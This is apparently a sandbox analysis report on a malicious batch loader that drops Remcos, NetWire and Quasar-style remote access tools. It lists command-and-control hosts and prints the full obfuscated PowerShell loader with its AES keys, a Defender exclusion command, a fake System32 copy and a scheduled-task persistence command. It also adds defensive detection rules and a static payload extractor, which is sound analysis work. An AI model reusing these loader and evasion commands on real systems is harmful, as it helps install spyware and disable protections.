Analysis
-
max time kernel
149s
-
max time network
149s
-
platform
windows10-2004_x64
-
resource
win10v2004-20221111-en
-
resource tags
arch:x64 arch:x86 image:win10v2004-20221111-en locale:en-us os:windows10-2004-x64 system
-
submitted
04-01-2023 06:45
-
Static task
static1
-
Behavioral task
behavioral1
-
Sample
mynew.bat
-
Resource
win7-20220812-en
General
-
Target
mynew.bat
-
Size
49KB
-
MD5
f010a779fc5fa3c0d6ef8d08cf2f82c3
-
SHA1
37dec5efe2443e43a4290473b372a40bd9f494f9
-
SHA256
7361111dc12ff526cb5391edfadb0a9ce69e75ba8d12b31122b224f9644290c0
-
SHA512
b76595be308c2e5c23e1f7e578573b1e108885d868a34ae10f18756de7f27f9be1beebc31b2e8275851bfa898f1a15b758ce3f903e7c888895a7779471670db8
-
SSDEEP
768:m/7oBdu40Ozbblz1Osan4ha4j0YJDH7bzzE1k07LEHZMIXlOJFt0X495YrS8ra:aEBvHblRI4hJDHnk1dvEVwJL649O2
Malware Config
Extracted
remcos
DEC2022
retsuportm.ddnsfree.com:2404
spreadrem1.ddnsfree.com:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
EXAMPLE.exe
-
copy_folder
EXAMPLE
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
YHGFTRDE.dat
-
keylog_flag
false
-
mouse_option
false
-
mutex
HPLKVPJH-J4G225
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
netwire
febnew2.ddns.net:6655
febnew1.ddns.net:6655
febnew4.ddns.net:6655
febnew5.ddns.net:6655
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
HostId-%Rand%
-
install_path
%AppData%\Install\Host.exe
-
lock_executable
false
-
offline_keylogger
false
-
password
1234
-
registry_autorun
false
-
use_mutex
false
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
NetWire RAT payload 6 IoCs
Processes:
resource | yara_rule
behavioral2/memory/760-194-0x0000000000400000-0x0000000000445000-memory.dmp | netwire
behavioral2/memory/760-197-0x0000000000400000-0x0000000000445000-memory.dmp | netwire
behavioral2/memory/760-198-0x0000000000400000-0x0000000000444095-memory.dmp | netwire
behavioral2/memory/760-202-0x0000000000400000-0x0000000000444095-memory.dmp | netwire
behavioral2/memory/2040-225-0x0000000000400000-0x0000000000445000-memory.dmp | netwire
behavioral2/memory/2040-227-0x0000000000400000-0x0000000000444095-memory.dmp | netwire
-
ModiLoader Second Stage 3 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3200-147-0x0000000000A20000-0x0000000000A4F000-memory.dmp | modiloader_stage2
behavioral2/memory/5108-186-0x0000000002270000-0x000000000229F000-memory.dmp | modiloader_stage2
behavioral2/memory/2532-205-0x00000000021D0000-0x00000000021FF000-memory.dmp | modiloader_stage2
-
Executes dropped EXE 9 IoCs
Processes:
pid | process
4536 | mynew.bat.exe
3200 | mbekur.exe
1716 | easinvoker.exe
2964 | mbekur.exe
5108 | jjweiy.exe
760 | jjweiy.exe
2532 | Host.exe
1200 | dhylty.bat.exe
2040 | Host.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | mynew.bat.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | jjweiy.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid | process
1716 | easinvoker.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oxzfbvmf = "C:\\Users\\Public\\Libraries\\fmvbfzxO.url" | mbekur.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Takipqpe = "C:\\Users\\Public\\Libraries\\epqpikaT.url" | jjweiy.exe
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
58 | api.ipify.org
59 | api.ipify.org
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
description | pid | process | target process
PID 3200 set thread context of 2964 | 3200 | mbekur.exe | mbekur.exe
PID 5108 set thread context of 760 | 5108 | jjweiy.exe | jjweiy.exe
PID 2532 set thread context of 2040 | 2532 | Host.exe | Host.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox attaches its generic note "likely ransomware behaviour" to this signature; nothing else in this report supports that reading (the extracted configurations are Remcos and NetWire, the scheduled task is named "Quasar Client Startup", and no file encryption is recorded), so treat it here as drive enumeration by the RAT stages.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
pid | process | events
4536 | mynew.bat.exe | 2
1732 | powershell.exe | 2
960 | powershell.exe | 2
3444 | powershell.exe | 2
1420 | powershell.exe | 2
1200 | dhylty.bat.exe | 2
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
2964 | mbekur.exe
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4536 | mynew.bat.exe
Token: SeDebugPrivilege | 1732 | powershell.exe
Token: SeDebugPrivilege | 960 | powershell.exe
Token: SeDebugPrivilege | 3444 | powershell.exe
Token: SeDebugPrivilege | 1420 | powershell.exe
Token: SeDebugPrivilege | 1200 | dhylty.bat.exe
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid | process | events
1200 | dhylty.bat.exe | 2
-
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid | process | events
1200 | dhylty.bat.exe | 2
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | process
2964 | mbekur.exe
1200 | dhylty.bat.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
pid -> target pid | process -> target process | events
3684 -> 4536 | cmd.exe -> mynew.bat.exe | 2
4536 -> 1440 | mynew.bat.exe -> cmd.exe | 2
1440 -> 1732 | cmd.exe -> powershell.exe | 2
1732 -> 3200 | powershell.exe -> mbekur.exe | 3
3200 -> 3344 | mbekur.exe -> cmd.exe | 3
3344 -> 860 | cmd.exe -> cmd.exe | 3
3344 -> 2580 | cmd.exe -> xcopy.exe | 3
3344 -> 2892 | cmd.exe -> cmd.exe | 3
3344 -> 3828 | cmd.exe -> xcopy.exe | 3
3344 -> 2612 | cmd.exe -> cmd.exe | 3
3344 -> 3184 | cmd.exe -> xcopy.exe | 3
3344 -> 1716 | cmd.exe -> easinvoker.exe | 2
1716 -> 4124 | easinvoker.exe -> cmd.exe | 2
3344 -> 876 | cmd.exe -> PING.EXE | 3
4124 -> 960 | cmd.exe -> powershell.exe | 2
3200 -> 2964 | mbekur.exe -> mbekur.exe | 4
4536 -> 1476 | mynew.bat.exe -> cmd.exe | 2
1476 -> 3444 | cmd.exe -> powershell.exe | 2
3444 -> 5108 | powershell.exe -> jjweiy.exe | 3
5108 -> 760 | jjweiy.exe -> jjweiy.exe | 4
760 -> 2532 | jjweiy.exe -> Host.exe | 3
4536 -> 3808 | mynew.bat.exe -> cmd.exe | 2
3808 -> 1420 | cmd.exe -> powershell.exe | 2
1420 -> 2316 | powershell.exe -> cmd.exe | 2
2316 -> 1200 | cmd.exe -> dhylty.bat.exe | 1
-
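The signatures above are each visible in one command line of the process tree: the renamed-PowerShell loader with its reversed-string method names, the `start /b powershell –ExecutionPolicy Bypass Start-Process` launcher, the xcopy into "C:\Windows \System32" (trailing space), the `Add-MpPreference -ExclusionPath 'C:\Users'` call and the `schtasks /create ... /sc ONLOGON ... /rl HIGHEST` task. The following detection logic is an added example, not part of the sandbox report: the rule names and regular expressions are this example's own, and the sample lines are trimmed copies of command lines from the report plus one constructed benign line. The `Find-ScriptBlockHits` function is an assumed way to run the same rules over PowerShell ScriptBlock logging (event 4104); it only returns results where that logging is enabled.

```powershell
# Added example (not from the sandbox report): command-line / script-block rules for the
# behaviours listed in Signatures. Rule names and regexes are this example's own.
# -match is case-insensitive in PowerShell, so the patterns carry no (?i).
$Rules = [ordered]@{
    # powershell.exe copied next to the .bat as <name>.bat.exe and run with -ep bypass
    'renamed-powershell-bat-exe'  = '\b[\w-]+\.bat\.exe"?\s+-noprofile\b.*?-(ep|executionpolicy)\s+bypass'
    # method name hidden as a reversed string, e.g. ('txeTllAdaeR'[-1..-11] -join '')
    'reversed-string-method-call' = "\('[A-Za-z0-9]+'\[-1\.\.-\d+\]\s+-join\s+''\)"
    # AES-CBC decrypt -> gunzip -> Assembly.Load, the in-memory loader chain
    'aes-gzip-assembly-load'      = 'AesManaged.*GZipStream.*Reflection\.Assembly'
    # mock system directory: "Windows " with a trailing space
    'mock-windows-dir'            = 'C:\\Windows \\System32'
    # Defender exclusion that covers every user profile
    'defender-exclusion-users'    = "Add-MpPreference\s+-ExclusionPath\s+'?C:\\Users"
    # logon-triggered task requesting highest privileges
    'schtasks-onlogon-highest'    = 'schtasks.*?/create.*?/sc\s+ONLOGON.*?/rl\s+HIGHEST'
    # cmd -> "start /b powershell -ExecutionPolicy Bypass Start-Process"; [-–] also catches the en dash in the report
    'start-b-powershell-launcher' = 'start\s+/b\s+powershell\s+[-–]ExecutionPolicy\s+Bypass\s+Start-Process'
}

# Returns the names of every rule the line matches (nothing for a clean line).
function Test-CommandLine {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine)
    foreach ($name in $Rules.Keys) {
        if ($CommandLine -match $Rules[$name]) { $name }
    }
}

# Trimmed copy of the PID 4536 command line (single-quoted here-string: nothing is expanded).
$loader = @'
"mynew.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Hnouz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mynew.bat').Split([Environment]::NewLine); $TxOqK = New-Object System.Security.Cryptography.AesManaged; $ourVj = New-Object System.IO.Compression.GZipStream($nIAlk, [IO.Compression.CompressionMode]::Decompress); $uPpYS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($APbgZ)
'@

# Constructed sample set: five lines from the report's tree and one benign line.
$Samples = [ordered]@{
    'loader (PID 4536)'    = $loader
    'launcher (PID 1440)'  = '"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath ''"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"'' & exit'
    'xcopy (PID 2580)'     = 'xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y'
    'defender (PID 960)'   = 'powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath ''C:\Users''"'
    'schtasks (PID 4932)'  = '"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe" /rl HIGHEST /f'
    'benign (constructed)' = '"C:\Windows\System32\cmd.exe" /c dir "C:\Windows\System32"'
}

function Invoke-SampleScan {
    foreach ($label in $Samples.Keys) {
        $hits = @(Test-CommandLine -CommandLine $Samples[$label])
        [pscustomobject]@{ Sample = $label; Hits = ($hits -join ', ') }
    }
}

# Assumed live use: event 4104 in Microsoft-Windows-PowerShell/Operational carries the script
# block text in Properties[2]; it is only written when Script Block Logging is enabled.
function Find-ScriptBlockHits {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value
            $hits = @(Test-CommandLine -CommandLine $text)
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Rules   = ($hits -join ', ')
                    Snippet = $text.Substring(0, [Math]::Min(100, $text.Length))
                }
            }
        }
}

Invoke-SampleScan | Format-Table -AutoSize
```

On the sample set the loader line fires the first three rules, each of the four report lines fires exactly the rule written for it, and the benign `dir` line fires none: the mock-directory rule requires the space before the backslash, so the real System32 path does not match. The same `Test-CommandLine` function can be pointed at Security 4688 events (command line in the event data when process command-line auditing is on) or Sysmon event 1; only the field index changes.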
Processes
-
[1] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\mynew.bat"
    - Suspicious use of WriteProcessMemory
    PID: 3684
-
  [2] C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe
      Command line: "mynew.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Hnouz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mynew.bat').Split([Environment]::NewLine);foreach ($aOvdy in $Hnouz) { if ($aOvdy.StartsWith(':: ')) { $VFBbN = $aOvdy.Substring(3); break; }; };$APbgZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFBbN);$TxOqK = New-Object System.Security.Cryptography.AesManaged;$TxOqK.Mode = [System.Security.Cryptography.CipherMode]::CBC;$TxOqK.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$TxOqK.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OHLMkWak0mShc6SWbTBetVDMdS/ZPNqnInWDRzUQwCY=');$TxOqK.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QyA1AR4yRiYXGDMq0ZKCyQ==');$mOLfG = $TxOqK.CreateDecryptor();$APbgZ = $mOLfG.TransformFinalBlock($APbgZ, 0, $APbgZ.Length);$mOLfG.Dispose();$TxOqK.Dispose();$nIAlk = New-Object System.IO.MemoryStream(, $APbgZ);$GUMsr = New-Object System.IO.MemoryStream;$ourVj = New-Object System.IO.Compression.GZipStream($nIAlk, [IO.Compression.CompressionMode]::Decompress);$ourVj.CopyTo($GUMsr);$ourVj.Dispose();$nIAlk.Dispose();$GUMsr.Dispose();$APbgZ = $GUMsr.ToArray();$uPpYS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($APbgZ);$vzwYm = $uPpYS.EntryPoint;$vzwYm.Invoke($null, (, [string[]] ('')))
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4536
-
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"' & exit
        - Suspicious use of WriteProcessMemory
        PID: 1440
-
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbekur.exe"'
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 1732
-
        [5] C:\Users\Admin\AppData\Local\Temp\mbekur.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\mbekur.exe"
            - Executes dropped EXE
            - Adds Run key to start application
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory
            PID: 3200
-
          [6] C:\Windows\SysWOW64\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\OxzfbvmfO.bat" "
              - Suspicious use of WriteProcessMemory
              PID: 3344
-
            [7] C:\Windows\SysWOW64\cmd.exe
                Command line: C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                PID: 860
-
            [7] C:\Windows\SysWOW64\xcopy.exe
                Command line: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                - Enumerates system info in registry
                PID: 2580
-
            [7] C:\Windows\SysWOW64\cmd.exe
                Command line: C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                PID: 2892
-
            [7] C:\Windows\SysWOW64\xcopy.exe
                Command line: xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                - Enumerates system info in registry
                PID: 3828
-
            [7] C:\Windows\SysWOW64\cmd.exe
                Command line: C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                PID: 2612
-
            [7] C:\Windows\SysWOW64\xcopy.exe
                Command line: xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
                - Enumerates system info in registry
                PID: 3184
-
            [7] C:\Windows \System32\easinvoker.exe
                Command line: "C:\Windows \System32\easinvoker.exe"
                - Executes dropped EXE
                - Loads dropped DLL
                - Suspicious use of WriteProcessMemory
                PID: 1716
-
              [8] C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                  - Suspicious use of WriteProcessMemory
                  PID: 4124
-
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Command line: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                    PID: 960
-
            [7] C:\Windows\SysWOW64\PING.EXE
                Command line: ping 127.0.0.1 -n 6
                - Runs ping.exe
                PID: 876
-
          [6] C:\Users\Admin\AppData\Local\Temp\mbekur.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\mbekur.exe"
              - Executes dropped EXE
              - Suspicious behavior: GetForegroundWindowSpam
              - Suspicious use of SetWindowsHookEx
              PID: 2964
-
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"' & exit
        - Suspicious use of WriteProcessMemory
        PID: 1476
-
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"'
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 3444
-
        [5] C:\Users\Admin\AppData\Local\Temp\jjweiy.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"
            - Executes dropped EXE
            - Adds Run key to start application
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory
            PID: 5108
-
          [6] C:\Users\Admin\AppData\Local\Temp\jjweiy.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\jjweiy.exe"
              - Executes dropped EXE
              - Checks computer location settings
              - Suspicious use of WriteProcessMemory
              PID: 760
-
            [7] C:\Users\Admin\AppData\Roaming\Install\Host.exe
                Command line: "C:\Users\Admin\AppData\Roaming\Install\Host.exe"
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                PID: 2532
-
              [8] C:\Users\Admin\AppData\Roaming\Install\Host.exe
                  Command line: "C:\Users\Admin\AppData\Roaming\Install\Host.exe"
                  - Executes dropped EXE
                  PID: 2040
-
    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dhylty.bat"' & exit
        - Suspicious use of WriteProcessMemory
        PID: 3808
-
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\dhylty.bat"'
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 1420
-
        [5] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dhylty.bat" "
            - Suspicious use of WriteProcessMemory
            PID: 2316
-
          [6] C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe
              Command line: "dhylty.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $AXUkl = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dhylty.bat').Split([Environment]::NewLine);foreach ($nOPQh in $AXUkl) { if ($nOPQh.StartsWith(':: ')) { $HPzIn = $nOPQh.Substring(3); break; }; };$xWiBK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($HPzIn);$KChVS = New-Object System.Security.Cryptography.AesManaged;$KChVS.Mode = [System.Security.Cryptography.CipherMode]::CBC;$KChVS.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$KChVS.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XW1/OClWDve6Edb4EFAPZMdLe56JDSmtEzYudqGm378=');$KChVS.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F5W/JJjAW9BS5IMGApFnNw==');$UHtkB = $KChVS.CreateDecryptor();$xWiBK = $UHtkB.TransformFinalBlock($xWiBK, 0, $xWiBK.Length);$UHtkB.Dispose();$KChVS.Dispose();$PLWwk = New-Object System.IO.MemoryStream(, $xWiBK);$pxfaJ = New-Object System.IO.MemoryStream;$PkfiQ = New-Object System.IO.Compression.GZipStream($PLWwk, [IO.Compression.CompressionMode]::Decompress);$PkfiQ.CopyTo($pxfaJ);$PkfiQ.Dispose();$PLWwk.Dispose();$pxfaJ.Dispose();$xWiBK = $pxfaJ.ToArray();$hrwta = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($xWiBK);$stuRW = $hrwta.EntryPoint;$stuRW.Invoke($null, (, [string[]] ('')))
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of SendNotifyMessage
              - Suspicious use of SetWindowsHookEx
              PID: 1200
-
            [7] C:\Windows\SYSTEM32\schtasks.exe
                Command line: "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\dhylty.bat.exe" /rl HIGHEST /f
                - Creates scheduled task(s)
                PID: 4932
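The two `-command` strings in the tree (PIDs 4536 and 1200) are one loader with different variable names. It reads its own .bat back from disk, takes the first line that starts with `:: ` (a batch comment, so cmd.exe skips it) as a base64 blob, decrypts it with AES-CBC/PKCS7 under a key and IV embedded in the command line, gunzips the result and hands the bytes to `Assembly.Load`. The method names are hidden by indexing a reversed string backwards: `'txeTllAdaeR'[-1..-11] -join ''` is `ReadAllText`, `'gnirtS46esaBmorF'[-1..-16]` is `FromBase64String`, `'daoL'[-1..-4]` is `Load`. Because key and IV are hard-coded, the stage is fully recoverable without running anything. The function below is an added static extractor, not code from the report or from the sample: it re-implements the same chain but writes the decrypted assembly to disk and hashes it instead of loading it. Key/IV defaults are the values in the PID 4536 command line; the function name, parameter names and output path are this example's own, and `Aes.Create()` stands in for the sample's `AesManaged` (same algorithm and mode).

```powershell
# Added example (not from the sandbox report): static re-implementation of the .bat loader's
# decode chain. Writes the payload to disk; never calls Assembly.Load. Run on an isolated host.
function Export-BatPayload {
    param(
        [Parameter(Mandatory)][string]$BatPath,
        # defaults: key/IV from the mynew.bat.exe command line in the report
        [string]$KeyB64 = 'OHLMkWak0mShc6SWbTBetVDMdS/ZPNqnInWDRzUQwCY=',
        [string]$IvB64  = 'QyA1AR4yRiYXGDMq0ZKCyQ==',
        [string]$OutPath
    )
    if (-not $OutPath) { $OutPath = "$BatPath.payload.bin" }

    # The loader takes the first line beginning with ':: ' as the base64 blob.
    $blobLine = [System.IO.File]::ReadAllLines($BatPath) |
        Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $blobLine) { throw "no ':: ' payload line found in $BatPath" }
    $cipherText = [Convert]::FromBase64String($blobLine.Substring(3))

    # AES-CBC with PKCS7 padding under the hard-coded key (32 bytes -> AES-256) and IV (16 bytes).
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [Convert]::FromBase64String($KeyB64)
    $aes.IV      = [Convert]::FromBase64String($IvB64)
    $decryptor = $aes.CreateDecryptor()
    try   { $compressed = $decryptor.TransformFinalBlock($cipherText, 0, $cipherText.Length) }
    finally { $decryptor.Dispose(); $aes.Dispose() }

    # gzip-decompress the plaintext; the result is the .NET assembly the loader would Load().
    $inStream  = New-Object System.IO.MemoryStream(, $compressed)
    $gzip      = New-Object System.IO.Compression.GZipStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    $outStream = New-Object System.IO.MemoryStream
    try   { $gzip.CopyTo($outStream) }
    finally { $gzip.Dispose(); $inStream.Dispose() }
    $payload = $outStream.ToArray()
    $outStream.Dispose()

    # A managed PE starts with 'MZ'. A wrong key/IV normally fails earlier with a padding
    # CryptographicException; a wrong blob normally fails in the gzip stage.
    if ($payload.Length -lt 2 -or $payload[0] -ne 0x4D -or $payload[1] -ne 0x5A) {
        Write-Warning 'decoded data does not start with an MZ header; check key and IV'
    }
    [System.IO.File]::WriteAllBytes($OutPath, $payload)
    [pscustomobject]@{
        Source = $BatPath
        Output = $OutPath
        Bytes  = $payload.Length
        SHA256 = (Get-FileHash -LiteralPath $OutPath -Algorithm SHA256).Hash.ToLower()
    }
}

# Usage (paths are assumed): the second call passes the key/IV pair from the dhylty.bat.exe command line.
# Export-BatPayload -BatPath 'C:\cases\mynew.bat'
# Export-BatPayload -BatPath 'C:\cases\dhylty.bat' -KeyB64 'XW1/OClWDve6Edb4EFAPZMdLe56JDSmtEzYudqGm378=' -IvB64 'F5W/JJjAW9BS5IMGApFnNw=='
```

The output file is the in-memory stage whose behaviour the tree shows (for mynew.bat: the `start /b powershell ... Start-Process` launches of mbekur.exe, jjweiy.exe and dhylty.bat; for dhylty.bat: the process that registers the "Quasar Client Startup" task), so it is the right object for static analysis and for a detection hash. Nothing in this function executes the payload, but the source .bat is live malware: keep it on an isolated analysis host.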
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize 471B
MD5 754711319399d090fd83609c28768137
SHA1 9733fc959a8fe4bcb71d761e62e8eae9e3bb29a7
SHA256 faa2fc7e8f87dc56ba6ba03f3f2d535277f2db38d561cfb67e103631c96287f7
SHA512 106f3978e9e0a2edfac6a57c95c3a6cd99b0d7a9ea7d5aba6fa374a31693be33b99eaa80874a284d71eb03a5b8b4ef1dec542202c05116f5ef050f8f769de1d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53
Filesize 471B
MD5 c136901c2a0696f7a5f4f45ba8725699
SHA1 a319de4877fc337bf0d9e9366c4060e306e1be0d
SHA256 d1fb0a203dfd0d3f900b66de6bc827fcefa90d39e291ef1a7c580ce83faef63d
SHA512 3bf064914a874a96834c35e0859f4338c1422e9cecb913d591aa9ce341da2e4976ed428f3a00f985b699787f118d1558c881b8aa1d102e3da0adbdaf476f5c50
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
Filesize 412B
MD5 4aead5217b122334672f2034e460c097
SHA1 da04f5c67d2e95b7123017c1d38428a14ddbaba4
SHA256 91d3257e30f2fb8b3603ba8f8fd4bd7573e7d908a928ebd5f970039b5505ceac
SHA512 60a389f87db4c715400570fb0c1a8df0d17f0a84d1cd2eb3a5c050a87d81b2c47044ddaad647a04c6e226c80f8805f477d7cff4a95ded3c9c04b189f6074bb5b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53
Filesize 442B
MD5 0b88eee4a66ec67db4df40c29f1f71e1
SHA1 2cfb80792ce5ddbd13d837f1ac9c0c189346d84a
SHA256 5e52f871f1b84209c4d549fab9bfa8e871114bcfb54d9ada82e729ad58cba2b3
SHA512 e7397ae2354c11314a013b0a5382b3e6f718af450df3c2f59e1fb5a47c85747f12e29edbe6581a23b1dd53c3a9a7bfa7ad4cedd35ee973af71c49ce15f3061e7
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 2KB
MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
